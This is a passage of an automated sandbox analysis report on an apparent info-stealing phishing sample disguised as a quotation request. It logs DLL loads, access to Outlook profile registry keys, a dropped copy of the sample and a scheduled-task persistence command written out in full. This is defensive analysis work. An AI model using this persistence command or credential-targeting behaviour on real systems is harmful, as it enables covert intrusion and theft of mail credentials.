                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: SnHY.pdb source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.dr
                  Source: Binary string: SnHY.pdbSHA256 source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.dr
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: 0x9F119049 [Mon Jul 27 01:26:33 2054 UTC]
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_024DDA70 push eax; retf 0_2_024DDA71
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_04D3ABA1 push 34052815h; retf 0_2_04D3ABAD
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_0763D710 push esp; retf 0_2_0763D711
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F9C30 push esp; retf 0728h7_2_053F9D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F8DDF push esp; iretd 7_2_053F8DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F8C2F pushfd ; iretd 7_2_053F8C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F891E pushad ; iretd 7_2_053F891F
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_024ADA70 push eax; retf 8_2_024ADA71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F3862 push E809A25Eh; ret 12_2_0A8F3869
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: section name: .text entropy: 7.772032192483331
                  Source: vTAuFgZcVE.exe.0.drStatic PE information: section name: .text entropy: 7.772032192483331
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile created: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
